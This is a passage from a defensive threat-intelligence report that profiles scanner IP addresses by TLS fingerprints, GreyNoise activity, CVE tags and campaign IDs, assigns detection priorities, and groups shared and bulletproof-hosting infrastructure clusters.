  • This indicates multi-tool deployment through multiple network paths (VPN + local)
  • Shares JA3 fingerprint 11a384388ad36777e1a2e121495037fe with Estonian (45.138.101.232) and Contabo (37.60.230.90) IPs
  • GreyNoise: 9,881 hits across 6 sensors since 2026-02-08 (brand new)

Detection Priority: MEDIUM – likely security researcher or bug bounty hunter using pfSense router for scanning

147.224.178.225 (Oracle Corporation, United States)

VirusTotal Classification:

  • Not queried individually (token conservation)
  • GreyNoise carries CVE-2026-1281 AND CVE-2026-0770 tags

Key Findings from Report:

  • Dual-tool deployment: Uses both standard Linux JA4T (132 sessions) AND Nuclei JA4T (233 sessions)
  • 365 sessions across 4 campaigns (3fk04, gt3fk, jfk04, rfk04)
  • Campaign ID pattern (*fk04) suggests sequential tool runs
  • GreyNoise: 23,109 hits across 10 sensors since 2026-02-01 (very recent)

Detection Priority: HIGH – dual exploitation tools, recent infrastructure, 2026 CVE tags

103.144.87.192 (Viet Storage, Vietnam)

Key Findings from Report:

  • Highest OAST domain-to-session ratio: 1,177 domains / 264 sessions = 4.46 domains per session
  • This indicates either:
    1. Multi-vector payload injection (same session hits multiple fields)
    2. Payload template reuse with rotating campaign IDs
  • Campaigns: p7a5r, 97a5r (both Feb 9-13)
  • JA4T: Mixed Nuclei fingerprints (MSS 65495, windows 65495 and 33280)

Detection Priority: MEDIUM – high-volume scanner, Log4j focus

Shared Infrastructure Patterns

JA3 Cluster (3 IPs, shared TLS library):

  1. 46.29.235.157 (AS215540, Netherlands/pfSense) - 3 JA4Ts
  2. 45.138.101.232 (AS41745, Estonia) - 1 JA4T: 64860..1380_7 (tunnel)
  3. 37.60.230.90 (AS51167, Contabo, France) - 1 JA4T: 64240..1460_7 (standard)

JA3 11a384388ad36777e1a2e121495037fe shared across all three, but divergent JA4T fingerprints indicate same application-layer tool deployed across different network configurations (pfSense VPN, tunnel MSS 1380, standard Linux).

Bulletproof Hosting Cluster:

  • 193.24.123.42 (PROSPERO, Russia) - CVE-2026-1281 exploitation
  • 179.43.146.42 (Private Layer, Switzerland) - C2 infrastructure, typosquatting

Both labeled BULLETPROOF by Censys (0.75 confidence), indicating takedown-resistant infrastructure.